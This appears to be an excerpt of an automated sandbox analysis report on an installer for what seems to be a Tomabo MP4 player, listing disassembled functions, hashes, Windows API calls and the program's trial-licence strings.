                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6db02805e2674338e69db510b074b12bf2146409d6bb3ab5e1758fec38b4ea7f
                                                                                                                                                                                                  • Instruction ID: fff6bae7e97fd8dc5d4d67864835d02d161daa8af87772218670333922ab2c43
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6db02805e2674338e69db510b074b12bf2146409d6bb3ab5e1758fec38b4ea7f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8D19A752092518FC319DF28D8D88E67BE5BF98700B1E86F9C9899B323D3329981CB55
                                                                                                                                                                                                  Function 004689D0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8ecd346ebd2316074ca4a381d0ce3de992720299fa0e9c67ab3f8aba6673880a
                                                                                                                                                                                                  • Instruction ID: b192a6be987dad8419fe499062d7315e266f1a7e483c7259b0c18181076e659a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecd346ebd2316074ca4a381d0ce3de992720299fa0e9c67ab3f8aba6673880a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EA15C3160D3814FC308CF6AC8906AAFBE2BFD9208F1DD97DE9C987316D671A5198B45
                                                                                                                                                                                                  Function 00481EE0 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 58510eae56ab131716b5c76b24fd968a38623d5fbbf4f7fbd9f7e030ebed667b
                                                                                                                                                                                                  • Instruction ID: 4393875c71537ec2ed6094939e3beddc73c374650410bff8245c9df444a37b86
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58510eae56ab131716b5c76b24fd968a38623d5fbbf4f7fbd9f7e030ebed667b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E79199B2A083568FC718DF19D59025EFBE2BBC9310F144D2EEA8597741D7B4E809CB86
                                                                                                                                                                                                  Function 00458670 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4c10e9d36185a942cd45e5a3cb8b402215b6e0bca62db49ef1f4c535eca0cc57
                                                                                                                                                                                                  • Instruction ID: 77d5a78e2c526ee02ad685650b2f3ef67128b52e7a96723acc629dc07b04b96c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c10e9d36185a942cd45e5a3cb8b402215b6e0bca62db49ef1f4c535eca0cc57
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19A11A74A087458FC314CF29C49096AFBF2BFC8704F198A6DE99997325EB30E905CB46
                                                                                                                                                                                                  Function 00485230 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8f6281a000032ca1c36854f340bb1e430629a1b41e9672c744d3991b9eebc63e
                                                                                                                                                                                                  • Instruction ID: d295db85f1ee37c903e927e484ffe8a96d569e5dd2165fa51cb14240efdb9345
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f6281a000032ca1c36854f340bb1e430629a1b41e9672c744d3991b9eebc63e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56817E327295864BDB1CCF29ECD052BB7A3AFCD340B5D883ED64A87356CD34A8158768
                                                                                                                                                                                                  Function 0047D180 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7759221d005c1581e2773d9425beac8999cf3a5f7771bd5080ef1a2ec29aab61
                                                                                                                                                                                                  • Instruction ID: abce41adfc5d50fa0d3ce17bc0d0fde4269d2e38d04156de7bfc48254121c9a0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7759221d005c1581e2773d9425beac8999cf3a5f7771bd5080ef1a2ec29aab61
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD510536B083814BD715DE2D98502A7FBE2DFC9320F58C9AED8DC87302D275E80A8795
                                                                                                                                                                                                  Function 004A5E20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a547d216f46f9d49a19fec309aad1e79dfbfcb46b1fd953d2a12a2a266bede37
                                                                                                                                                                                                  • Instruction ID: c03a268300cd1889648da09b2047a6451de8417136f20bedba57c0ea7081a424
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a547d216f46f9d49a19fec309aad1e79dfbfcb46b1fd953d2a12a2a266bede37
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB317A36A117204FC75DDFFAED5646E7AB2E3E0314342822ED812CB265DB780409AAE5
                                                                                                                                                                                                  Function 00430781 Relevance: 70.5, APIs: 1, Strings: 39, Instructions: 467COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00430786
                                                                                                                                                                                                    • Part of subcall function 00429442: __EH_prolog.LIBCMT ref: 00429447
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                    • Part of subcall function 00439D28: __EH_prolog.LIBCMT ref: 00439D2D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                                                                                                                                  • String ID: %d/%d$%d:%d$%dx%d$Album$Aspect$Author$BitRate$Channels$Codec$Comment$Copyright$DurationInUs$FileType$Flags$Format$FrameRate$Frames$Genre$Index$Language$MediaType$MetaData$Resolution$SampleRate$SelectedAudioStream$SelectedCaptionStream$SelectedSubtitleStream$SelectedVideoStream$Size$StartTimeInUs$Stream$Streams$Title$Track$Year$audio$caption$subtitle$video
                                                                                                                                                                                                  • API String ID: 2206737547-198990648
                                                                                                                                                                                                  • Opcode ID: 80520f64d0df88e95f76565cdd242d8519106e43bc8e00c17dfbdc04f103485c
                                                                                                                                                                                                  • Instruction ID: 01efc49c770ffab0a35f27e105bb01f846b77bf4441460fcc177f7dceafd55cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80520f64d0df88e95f76565cdd242d8519106e43bc8e00c17dfbdc04f103485c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2028030B0061EAACF04FFF2E856DED7769AF08318B40442FB515A7591EB3DAA45CB58
                                                                                                                                                                                                  Function 004AD8D0 Relevance: 55.9, APIs: 37, Instructions: 426windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AD8E4
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004AD8FD
                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000002), ref: 004AD90D
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004AD91F
                                                                                                                                                                                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004AD947
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004AD957
                                                                                                                                                                                                    • Part of subcall function 004AD590: InflateRect.USER32(?,000000FF,000000FF), ref: 004AD5D2
                                                                                                                                                                                                    • Part of subcall function 004AD590: IsWindowEnabled.USER32(?), ref: 004AD5E5
                                                                                                                                                                                                    • Part of subcall function 004AD590: InflateRect.USER32(?,000000FF,000000FF), ref: 004AD60C
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD623
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD63C
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD654
                                                                                                                                                                                                    • Part of subcall function 004AD590: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004AD66E
                                                                                                                                                                                                    • Part of subcall function 004AD590: SelectObject.GDI32(?,?), ref: 004AD693
                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 004AD969
                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004AD96D
                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 004AD975
                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004AD979
                                                                                                                                                                                                  • SendMessageA.USER32(?,00000135,?,?), ref: 004AD98B
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004AD993
                                                                                                                                                                                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004AD9B8
                                                                                                                                                                                                  • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004AD9F0
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004AD9F7
                                                                                                                                                                                                  • SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 004ADA0B
                                                                                                                                                                                                  • GetWindowTextA.USER32(?,?,00000100), ref: 004ADA79
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004ADDCF
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004ADDE2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2549663215-0
                                                                                                                                                                                                  • Opcode ID: 384b5b170c1cbb0f478c1712ffa6985f51e9bfefbccb5adf81986f16ca5c7857
                                                                                                                                                                                                  • Instruction ID: 8413aa433982514e446c327abfc0626d20cb0baffa1ce925df97e537fa60ecbb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 384b5b170c1cbb0f478c1712ffa6985f51e9bfefbccb5adf81986f16ca5c7857
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF168B1508301AFD300DF64CC89E6FBBE8FB99704F44492DF58282251E7B9E905CB6A
                                                                                                                                                                                                  Function 00429C8C Relevance: 49.3, APIs: 11, Strings: 17, Instructions: 269windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00429C91
                                                                                                                                                                                                    • Part of subcall function 004B5698: SetWindowTextW.USER32(?,?), ref: 004B56A6
                                                                                                                                                                                                    • Part of subcall function 004B5552: GetDlgItem.USER32(?,?), ref: 004B5560
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00508FAC,00000001), ref: 00429CDE
                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00429CE2
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00508F9C,00000001), ref: 00429D08
                                                                                                                                                                                                    • Part of subcall function 004B1F9A: lstrlenW.KERNEL32(00000000,00000000,?,?,004C4ED0,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004B1FC4
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429D71
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429DFF
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F04), ref: 00429E4E
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429EB0
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F04), ref: 00429F12
                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00429F8A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00429FA8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • If you want to continue using this software, you must purchase a license. Please click 'Buy Now' button to get one.If you alread, xrefs: 00429DDB
                                                                                                                                                                                                  • Close, xrefs: 00429D32
                                                                                                                                                                                                  • If you want to continue using this software, you must purchase a new license. Please click 'Buy Now' button to get one.If you al, xrefs: 00429E3D
                                                                                                                                                                                                  • If you want to continue using this software after this license expires, you must purchase a new license., xrefs: 00429E8C
                                                                                                                                                                                                  • Your free %d-day trial will expire soon., xrefs: 00429F2A
                                                                                                                                                                                                  • If you want to continue using this software after your free trial expires, please click 'Buy Now' button to purchase a license.I, xrefs: 00429F63
                                                                                                                                                                                                  • Expiration date: %d-%d-%d., xrefs: 00429E2F, 00429E7E
                                                                                                                                                                                                  • Your license has expired!, xrefs: 00429E01
                                                                                                                                                                                                  • Your license will expire soon., xrefs: 00429E50
                                                                                                                                                                                                  • Free %d-day trial, %d %s left., xrefs: 00429DBE, 00429EF3, 00429F55
                                                                                                                                                                                                  • Your free %d-day trial has expired!, xrefs: 00429D93, 00429EC8
                                                                                                                                                                                                  • days, xrefs: 00429DB1, 00429EE6, 00429F48
                                                                                                                                                                                                  • https://www.tomabo.com/mp4-player/purchase.html, xrefs: 00429FBC, 00429FC7, 00429FC8
                                                                                                                                                                                                  • day, xrefs: 00429DAA, 00429DB6, 00429EDF, 00429EEB, 00429F41, 00429F4D
                                                                                                                                                                                                  • Continue, xrefs: 00429F70
                                                                                                                                                                                                  • If you want to continue using this software, please click 'Buy Now' button to purchase a license.If you already have a license, , xrefs: 00429F01
                                                                                                                                                                                                  • This license doesn't work with the current version., xrefs: 00429DCE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: IconLoad$MessageSend$ColorH_prologItemTextWindowlstrlen
                                                                                                                                                                                                  • String ID: Close$Continue$Expiration date: %d-%d-%d.$Free %d-day trial, %d %s left.$If you want to continue using this software after this license expires, you must purchase a new license.$If you want to continue using this software after your free trial expires, please click 'Buy Now' button to purchase a license.I$If you want to continue using this software, please click 'Buy Now' button to purchase a license.If you already have a license, $If you want to continue using this software, you must purchase a license. Please click 'Buy Now' button to get one.If you alread$If you want to continue using this software, you must purchase a new license. Please click 'Buy Now' button to get one.If you al$This license doesn't work with the current version.$Your free %d-day trial has expired!$Your free %d-day trial will expire soon.$Your license has expired!$Your license will expire soon.$day$days$https://www.tomabo.com/mp4-player/purchase.html
                                                                                                                                                                                                  • API String ID: 241116362-3590744592
                                                                                                                                                                                                  • Opcode ID: 698083b1279744a0a6676de9459ff6ad405c670bb7b325ae18272eef2f9b0954
                                                                                                                                                                                                  • Instruction ID: 1f559b4b82b214c739383b9643d27565b42a58743d5f5a3b929e39be36a7bbeb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 698083b1279744a0a6676de9459ff6ad405c670bb7b325ae18272eef2f9b0954
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAA1E270E00309AADB20EBA5DD46FFEB6A5EF10708F50041EF606A22D1DB6CA904C769
                                                                                                                                                                                                  Function 004AC810 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 136COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050CEA0,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC81B
                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004AC823
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004AC834
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 004AC83B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004AC859
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004AC864
